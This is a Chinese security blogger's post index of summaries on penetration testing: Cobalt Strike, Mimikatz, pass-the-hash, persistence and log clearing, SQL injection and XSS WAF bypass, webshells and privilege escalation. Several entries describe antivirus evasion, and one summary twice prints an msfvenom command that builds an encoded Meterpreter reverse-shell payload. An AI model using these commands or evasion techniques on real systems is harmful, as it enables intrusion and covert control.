- 博客(258)
- 资源 (2)
- 收藏
- 关注
原创 CS内网渗透Cobalt Strike 插件使用方式详解
Cobalt Strike 插件(通常称为 Aggressor Scripts)是使用 Aggressor Script 语言编写的脚本,用于扩展 Cobalt Strike 的功能。加载插件后,插件通常会在 Cobalt Strike 的菜单中添加新选项,或为 Beacon 提供新命令。如果有更多疑问,随时告诉我。:如果 Cobalt Strike 的内置功能无法满足特定需求,插件可以提供额外的攻击或管理能力。:在某些特殊的网络环境或目标系统中,插件可以提供定制化的攻击策略或防御规避方法。
2025-05-16 06:00:00
1495
原创 反向搭理搭建于网络安全的分层关系讨论
通过在 VM 上部署 Nginx 反向代理,可以构建一个既高效又安全的前端接入层。利用配置文件中的各种指令(如 proxy_set_header 和 proxy_pass)实现请求转发,同时结合 WAF 模块(例如 ModSecurity)与防火墙策略,可以在网络边界、应用层提供多重安全防护。目前,大多数企业和云服务平台都倾向于这种分层防护模式,不仅可以隐藏内部架构,降低风险,还能对各种网络攻击进行实时检测与拦截。此外,正确配置头信息也能确保后端服务器获得真实的客户端 IP 信息,便于日志记录和安全监控。
2025-05-14 06:59:40
1082
原创 CS内网渗透 ----【内网渗透实战】PsExec vs Telnet:建立IPC通道实现横向移动与域控上线全解析
PsExec是Microsoft Sysinternals套件中的一款工具,允许在远程Windows系统上执行命令和启动交互式shell,无需在目标主机上安装客户端,利用SMB协议传输数据,支持凭证传递和输出重定向。相比之下,Telnet是一种较老的远程登录协议,基于明文传输,功能有限且安全性低。PsExec在内网渗透中具有高隐蔽性和灵活性,能够利用域用户凭证进行远程命令执行,适用于横向移动和控制域控主机。通过实际案例,展示了如何利用PsExec上线域控主机,证明了其在企业内网渗透中的高效性。此外,PsEx
2025-05-13 14:50:42
640
原创 CS内网渗透 - 自带的工具 Mimikatz 的主要功能与作用
Mimikatz是一款针对Windows平台的后渗透工具,主要用于凭证转储、令牌操作和提权,帮助攻击者在获得初步访问权限后,通过提取内存中的明文密码、哈希和Kerberos票据,进行横向移动和权限提升。在内网环境中,Mimikatz常用于横向攻击、持久化配置和安全态势侦查。尽管WAF和防火墙对其本地操作影响有限,但杀毒软件和EDR系统通过签名检测和行为监控对Mimikatz的防御效果显著。攻击者常通过代码混淆和内存注入等技术绕过检测。因此,防御方需加强监控和内存保护措施,以有效应对Mimikatz的威胁。
2025-05-12 06:41:16
603
原创 反向代理对于 网络安全中服务器的一些思考
反向代理在 Linux 系统中(如通过 Nginx 实现)是常见的架构设计,在渗透测试中识别它至关重要。通过 HTTP 头、网络流量、特制请求等方法可确认其存在,结合配置文件分析可进一步定位后端服务器。实际案例中,绕过反向代理往往能暴露更多漏洞。
2025-05-11 08:33:52
900
原创 内网渗透 持久化以及日志清理 技术手法方案
隐蔽持久化:目标在于在目标系统中部署一个后门,并通过系统自带的服务管理(Linux:Systemd + Cron;Windows:WMI 事件订阅、计划任务或注册表 Run 键)确保系统重启或后门被终止时能够自动恢复控制。恢复机制:所有方法均设计为自动检测服务/进程状态,并在发现中断时重新启动后门 payload,从而保证长期控制。伪装与隐蔽:命令、文件名、任务名称、服务名称均伪装成合法或系统组件,降低被安全工具或管理员发现的风险。灵活性。
2025-05-11 08:27:10
1163
原创 MSF 生成不同的木马 msfvenom 框架命令
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的Payload(有效载荷),如木马、后门等,主要用于测试系统安全性。它支持多种编码方式、文件格式和平台。针对Windows平台,msfvenom可以生成EXE、VBS、PowerShell、DLL、Python等格式的木马,并可通过编码避免检测。对于Linux平台,它支持生成ELF、Bash、Python、Perl等格式的木马。此外,msfvenom还支持跨平台Payload生成,如Python和Ruby脚本。其他实用技巧包括生成多平
2025-05-10 00:00:00
1164
原创 powershell_bypass.cna 插件(适配 Cobalt Strike 4.0 的免费版本下载地址)
powershell_bypass.cna 是一个适配 CobaltStrike 4.0 的插件,用于通过 PowerShell 生成免杀的 EXE 文件,绕过杀毒软件检测并实现上线。插件可从 GitHub 下载,但需注意与 CobaltStrike 版本的兼容性。生成 EXE 文件时若出现“运行异常,请查看 ScriptConsole”错误,可通过检查 ScriptConsole 输出、确认插件与 CobaltStrike 版本兼容性、检查 PowerShell 环境及插件配置等步骤进行排查和修复。插件的
2025-05-09 17:12:50
773
原创 “Cobalt Strike Aggressor脚本提权全解析:从监听器到SYSTEM/root的渗透实战指南“
Aggressor脚本是Cobalt Strike(CS)内置的一种脚本语言,用于自动化CS功能,包括提权操作。提权过程通常包括信息收集、漏洞利用和权限提升。脚本可以针对多种漏洞,如Windows的CVE-2021-1732和Linux的CVE-2021-4034,通过上传并执行漏洞利用代码来提升权限。在Windows系统中,提权至SYSTEM权限;在Linux系统中,提权至root权限。整个过程从创建监听器、生成Payload、投递Payload到编写和执行Aggressor脚本,最终实现权限提升。
2025-05-09 17:09:11
808
原创 内网渗透实战 ---「MSF实战:利用smart_hashdump导出内网Windows服务器及域控哈希密码的完整指南」
是MSF中的一个强大后渗透模块,路径为,专门用于从Windows系统中提取用户密码哈希(NTLM哈希)。自动检测系统类型:无论是普通Windows服务器还是域控制器,模块都能自动选择合适的导出方式。导出范围广:在普通服务器上导出本地用户哈希,在域控上导出域内所有用户哈希。操作简便:只需简单的配置即可完成哈希导出,适合渗透测试和红队任务。导出的哈希通常是NTLM格式,可用于后续的密码破解或Pass-the-Hash(PtH)攻击。普通服务器:提取本地用户哈希,用于横向移动。域控。
2025-05-07 07:19:36
1191
原创 网络安全实战指南:从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)
隔离与遏制:阻止恶意软件扩散。识别与分析:确定攻击来源和恶意行为。清除与恢复:移除恶意软件并修复系统。日志分析:追踪攻击路径和影响。加固与预防:防止再次入侵。隔离与遏制:阻止恶意软件扩散。识别与分析:定位异常进程和网络活动。清除与恢复:移除恶意软件并修复。日志分析:追踪攻击路径。加固与预防:提升安全性。
2025-04-28 14:05:03
2684
原创 SQL注入漏洞 GetShell 几种方式详解
(SQL Injection)是一种常见的 Web 应用程序安全漏洞,攻击者通过向 Web 应用程序的输入字段(如 URL、表单或 Cookie)插入恶意 SQL 查询语句,进而操控数据库执行未授权的操作。通过 SQL 注入,攻击者不仅可以窃取、篡改数据,还可能通过执行特定的 SQL 命令获得服务器的 shell 权限,即。:尽量定期检查 Web 服务器的日志文件,查找异常行为(例如不正常的文件上传,文件访问请求等),以便及时发现 WebShell。然后,攻击者可以逐步更改条件,来猜测数据库中的数据。
2025-04-27 18:30:00
2490
原创 XSS 绕过 WAF 深度解析:大数据趋势下的高成功率 Payload 实战指南“
已失效: HTML 实体、大小写混合、简单 URL 编码等传统方法被 2025 年 WAF 全面拦截,检测率超 90%。高成功率: 混合编码(85%)、上下文拼接(88%)、标签语法替换(84%)等因复杂性和盲点仍有效。未来趋势: 2025 年 WAF 将进一步整合 AI,渗透测试需借助动态生成和对抗性技术(如 GAN)应对。
2025-04-27 00:00:00
2031
原创 网络安全于应用服务web中间件服务 默认配置文件的关联(配置漏洞)
中间件与 Web 应用服务的配置文件:包括 Nginx、Apache、Tomcat、JBoss/Wildfly、IIS、Redis、MySQL、Node.js 等各自的主配置文件和补充配置文件。默认存放位置:Linux 下多集中在/etc/或安装目录内的conf目录;Windows 下则多存于安装目录内(如或)以及部分系统服务配置在系统目录。配置文件与网络安全关联:配置文件决定了访问控制、SSL/TLS、日志记录、WAF 规则等安全策略,直接影响系统防护能力。
2025-04-26 18:30:00
1872
原创 计算机网络中的DHCP是什么呀? 详情解答
DHCP 是什么:动态分配 IP 地址的协议,简化网络管理。与网络安全的关系:便利性带来风险,如欺骗、耗尽和未授权访问。漏洞:协议设计缺陷和软件实现问题(如缓冲区溢出、DoS)需关注。实例:既能保护(如限制接入),也可能被利用(如中间人攻击)。通过合理配置和防护措施,DHCP 可以在提供便利的同时降低安全风险。
2025-04-26 00:00:00
2107
原创 SQL注入高级绕过手法汇总 重点
SQL注入已发展为多维攻击,结合编码混淆、协议特性、数据库特性等技术,挑战WAF防护能力。ModSecurity、Cloudflare、AWS WAF、F5 BIG-IP ASM等工具各有优势,但规则盲点、性能限制及配置漏洞仍可被利用。:通过编码转换(如URL、Unicode、HTML实体)改变Payload形式,绕过WAF对关键字或字符的检测。:分散Payload至URL、Body、Header,WAF难以完整检测。:利用数据库特有语法或函数,构造WAF未覆盖的Payload。
2025-04-25 17:45:00
1794
原创 GitHub红队常用Web指纹收集工具与攻击技巧:渗透测试必备工具解析
EHole、FOFA-hub 因更贴合国内企业技术栈,使用率超过传统工具(如Wappalyzer)。,支持多工具联动(如ObserverWard、Xray)。(如WordPress、Joomla、Drupal)。支持被动流量监听(如配合Burp Suite)。(ObserverWard)添加私有系统指纹。指纹规则,包括OA系统、防火墙、云服务等。高精度识别国内常见系统(如用友、泛微)。支持主动提交新指纹,适合红队定制化需求。适合大规模资产测绘(如全端口扫描联动)。数据库覆盖广(6,000+技术栈)。
2025-04-25 00:00:00
1904
原创 总结-SQL注入分类手法注入漏洞总结性分化说明
SQL注入类型多样,攻击手法随防护技术演进不断变化。实际工作中需结合代码审计、自动化工具及安全开发规范(如OWASP TOP 10)综合防御。最新漏洞案例表明,即使成熟系统也可能因开发疏忽导致风险,持续的安全意识培训与漏洞修复机制至关重要。
2025-04-24 17:45:00
928
原创 SQL注入漏洞中会使用到的函数
掌握这些函数的作用机制,可更精准地设计防御策略与检测规则。:盲注中逐字符转换ASCII值。:合并多行结果为单个字符串。:数据库账户仅授予必要权限。用于一次性获取所有表名。:获取当前数据库名称。:严格校验参数类型,过滤。:获取当前数据库用户。:获取数据库版本信息。配合TRY-CATCH。:绕过WAF过滤,如。
2025-04-24 00:00:00
1709
原创 网络安全中Base64编码到后端是何解了
Base64编码传输必须配合HTTPS加密、数据签名、输入验证等多层防御措施,任何单一依赖Base64的方案都存在严重安全隐患。建议企业按照等保2.0三级要求,对涉及Base64的接口进行专项安全审计。
2025-04-23 17:30:00
2799
原创 OSI七层模型、TCP协议、三次握手、四次挥手与网络安全的深度(漏洞)解析
OSI模型是分析网络攻击面的核心框架,TCP机制(三次握手/四次挥手)是多数传输层攻击的切入点。安全需分层实施:例如,即使应用层有HTTPS,若网络层存在IP欺骗仍可被绕过。漏洞利用链:高级攻击(如APT)常组合多层漏洞(如ARP欺骗+SSL剥离+XSS)。通过理解OSI模型与TCP协议细节,可精准定位安全防护点,实现纵深防御(Defense in Depth)。
2025-04-23 06:30:00
2365
原创 网络安全之最主要的端口443 你该如何处理
gobuster dir -u https://<目标IP>/ -w /usr/share/wordlists/dirbuster/common.txt -k。: 托管网站、Web应用(如电商、博客、企业门户)、API接口等,通过HTTPS加密用户与服务器的交互数据(如登录凭证、支付信息)。nmap -sV -p443 <目标IP> # 识别服务版本(如Apache、Nginx、IIS、VPN服务等)OpenVPN:检查CVE-2020-15078(权限提升)、CVE-2017-5618(DoS)。
2025-04-21 18:00:00
2855
原创 信息收集之hack用的网络空间搜索引擎
设备发现漏洞分析数据泄露检测:LeakIX威胁情报这些工具功能强大,在黑客、网络安全专家和白帽子工程师的日常工作中有着广泛应用。希望这些推荐对您有所帮助!如果您有其他具体需求,可以随时告诉我,我会进一步优化建议!
2025-04-21 07:22:06
2372
原创 文件包含漏洞 不同语言危险函数导致的漏洞详解
文件包含漏洞(File Inclusion Vulnerability)发生在 Web 应用动态加载文件时,未能对用户输入进行充分验证,导致攻击者通过操控参数包含并执行恶意文件。发现漏洞需要结合代码审计和黑盒测试,而防御的关键是对用户输入进行严格验证(如使用白名单)。文件包含漏洞是 Web 安全中的高危漏洞,可能导致信息泄露、代码执行或服务器失控。以下列出各语言中与文件包含漏洞相关的危险函数,并说明其利用方法。以下是文件包含漏洞的实际利用案例,涵盖不同场景和语言。
2025-04-17 00:00:00
2090
原创 Windows 信息收集指南:从渗透测试到提权再到应急响应的命令(工具类)
Windows 系统信息收集,从渗透测试到应急响应的核心命令,涵盖版本、进程、网络、用户等类别。通过实战案例展示应用场景,补充遗漏知识点,提供完整命令集合,助你掌握安全攻防利器
2025-04-16 06:30:00
2729
原创 SQL注入漏洞之如何利用information_schema数据库进行SQL注入攻击
MySQL 5.0前后的安全差异在SQL注入中的作用MySQL、MSSQL、Oracle的识别方法SQL注入常用数据库语句数据库备份与SQL注入结合MySQL用户权限管理SQL UNION在注入中的应用。
2025-04-16 00:45:00
949
原创 渗透测试之信息收集 目录扫描工具(附带字典)
极速模糊测试工具,支持目录爆破、参数模糊测试(GET/POST)、多字典并发。: 多模式工具(支持 DNS、目录、子域名扫描),结合并发和字典优化。: 快速枚举隐藏目录和文件,支持自定义 HTTP 头和扩展名过滤。: 高性能递归扫描,自动过滤无效结果,支持代理和自定义字典。: 针对 Web 应用的深度模糊测试,结合目录和参数扫描。: 轻量快速,支持多线程、自定义字典、代理和递归扫描。: 经典工具,支持递归扫描、动态字典生成和结果可视化。: 轻量级工具,支持异步扫描和自定义字典,输出简洁。
2025-04-15 17:00:00
3357
原创 HTTP请求方法安全剖析(不安全的网络请求方法):从CVE-2017-12615看PUT/DELETE的风险利用
这个漏洞的核心在于,当Tomcat服务器启用了HTTP的PUT请求方法时,攻击者可以通过该方法直接向服务器上传任意文件,包括恶意文件(如webshell)。PUT方法是HTTP协议中用于上传文件的功能,当服务器未正确验证上传文件的权限或路径时,攻击者就能将恶意代码部署到服务器上,从而可能实现远程代码执行。利用CVE-2017-12615上传webshell的步骤与普通文件上传类似,但需要构造一个恶意JSP文件(如webshell)。:直接上传文件,特定漏洞(如CVE-2017-12615)中非常关键。
2025-04-15 12:30:00
1920
原创 内网渗透 --- 之杀软工具探测
通过 tasklist、WMIC、注册表查询、Nmap NSE 脚本等手段,全面识别目标内网主机上安装的杀软及其运行状态。根据检测结果,评估杀软对后续上传、反弹 shell、提权操作的影响。采用内存执行、代码混淆、延时执行等策略来绕过杀软检测,并在合法测试范围内(或在红队演练中)视情况暂时禁用部分服务。在注入 webshell 后,通过 tasklist /svc 和 sc query 命令检查关键杀软进程和服务的状态,判断是否存在干扰,并确认操作是否成功执行。
2025-04-14 17:00:00
3314
原创 Webshell管理工具 [流量分析总结文档 蚁剑、冰蝎、菜刀、哥斯拉]
本文从红队视角出发,分析这些工具的最新特性、流量特征及绕过WAF(Web应用防火墙)的魔改方案,同时为蓝队提供防御对策,帮助安全从业者全面掌握WebShell的应用与应对策略。本文全面剖析了菜刀、蚁剑、冰蝎和哥斯拉四款WebShell管理工具,从特性、流量特征到魔改方案,为红队提供了绕过WAF的实用策略,同时为蓝队设计了针对性的防御措施。:魔改菜刀,将POST请求伪装为图片上传,payload经AES加密后通过HTTPS传输,成功绕过某商业WAF。:加密通信,规避传统检测,支持Java类加载。
2025-04-14 11:01:34
4144
原创 挂马漏洞 asp连接冰蝎webshell (附webshell源码 仅限学习研究)
此代码仅用于学习,真实冰蝎使用加密通信(AES)和混淆技术,避免被检测。为了学习目的,代码未实现冰蝎的完整加密通信(真实冰蝎使用AES加密),但保留了基本连接逻辑。获取冰蝎管理端(Behinder),这是一个开源工具,可从合法渠道下载用于学习。:IIS默认用户(IUSR)权限较低,可能无法执行某些命令(如系统级操作)。:仅在自己控制的测试环境(如虚拟机)中使用,切勿上传到未经授权的服务器。请求头传递(实际冰蝎可能使用加密方式,需根据客户端配置调整)。点击“连接”,如果配置正确,冰蝎会显示成功连接。
2025-04-12 11:01:49
3289
原创 CS内网渗透 - 内网渗透中的后渗透手法PTH利用
Pass-The-Hash(PTH)攻击是一种利用已知用户哈希值(通常为 NTLM 哈希)进行身份验证的技术,无需知道明文密码即可成功认证。Windows 在身份验证过程中,通常使用用户密码的哈希值而非明文密码进行比较。如果攻击者通过工具(例如 Mimikatz)从内存中提取到了某个账户的 NTLM 哈希,就能利用这个哈希在其他系统上模拟该用户进行身份验证。主要特点:无需破解明文密码:直接利用已提取的哈希值。横向移动与远程执行:可以利用相同的哈希在其他系统上进行认证,从而实现横向移动。
2025-04-12 10:57:46
3944
原创 网络安全中信息收集需要收集哪些信息了?汇总
在网络安全渗透测试中,信息收集是最基础也是最关键的步骤,主要目的是通过各种手段收集目标系统的公开信息,为后续的漏洞扫描、漏洞利用和攻击提供依据。
2025-04-11 00:00:00
4791
原创 Session 与 Cookie 安全全解析:区别、漏洞与防护策略
Session 通常通过 Cookie 传递一个唯一的 Session ID,服务器根据此 ID 查找对应的会话数据。:Session 因数据存储在服务器端,比 Cookie 更安全,但需保护好 Session ID。:数据在服务器端,相对安全,但 Session ID 泄露可能导致风险。:敏感数据存储在服务器,客户端仅持有 Session ID,安全性更高。:攻击者诱导用户在登录状态下访问恶意网站,触发带 Cookie 的请求。:Session ID 若泄露,可能导致会话劫持,但数据本身较安全。
2025-04-10 11:30:00
4857
原创 深入解析 JWT、Token、Session 与 Cookie:网络安全身份验证机制与漏洞攻防
相反,客户端在每次请求中携带 Token,服务器通过验证 Token 的内容(签名、过期时间等)来确认用户身份。Token 可以是任意格式的字符串,而 JWT 是 Token 的一种标准化实现。:Token 的一种具体实现,遵循标准化的结构(Header、Payload、Signature),并包含签名以确保安全性。:描述 Token 的类型(通常是 "JWT")和使用的签名算法(如 HS256、RS256)。:包含声明(Claims),如用户信息(用户 ID、角色等)和元数据(发行时间、过期时间等)。
2025-04-10 06:30:00
4710
原创 揭秘HTTP请求头:渗透测试中的漏洞利用与防御策略
HTTP请求头是客户端在向服务器发送HTTP请求时附带的信息,用于描述客户端环境、认证信息和请求内容等。常见的HTTP请求头字段包括User-AgentCookieReferer等。然而,这些字段若未被正确处理,可能成为攻击者的突破口。SQL注入:通过在请求头字段中注入恶意SQL语句,操纵数据库操作。XSS:通过注入恶意脚本,使其在受害者浏览器中执行。CSRF:利用伪造请求头字段绕过防护,执行未经授权的操作。
2025-04-09 00:15:00
2492
原创 CS内网渗透 - 如何通过冰蝎 Webshell 上线 Weblogic 服务器到 Cobalt Strike 并绕过杀软检测(360、火绒)?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5。msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5。
2025-04-09 00:00:00
2236
原创 提权 (Mysql)MOF提权深度解析:从MySQL到SYSTEM权限的提升技术与实际案例 一种利用率不高却可以了解一下的数据库提权方式
MOF提权是一种利用Windows MOF文件执行机制,通过MySQL文件写入功能实现权限提升的技术。它主要适用于Windows 2003及更早版本,对MySQL版本无严格要求,但需为空。成功率和利用率因条件苛刻和系统更新而较低,实际案例多见于老旧系统。攻击者需谨慎操作并清理痕迹,以避免暴露。现代环境中,MOF提权已逐渐被更高效的提权技术取代。
2025-04-08 13:00:00
3812
原创 提权:[MySQL UDF提权全攻略:Windows与Linux实战步骤详解 可以了解一下的提权手法]
UDF(User-Defined Function,用户自定义函数)是MySQL支持的一种扩展机制允许用户通过动态链接库(Windows下为DLL文件,Linux下为SO文件)自定义函数来扩展MySQL功能。
2025-04-08 06:00:00
3348
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人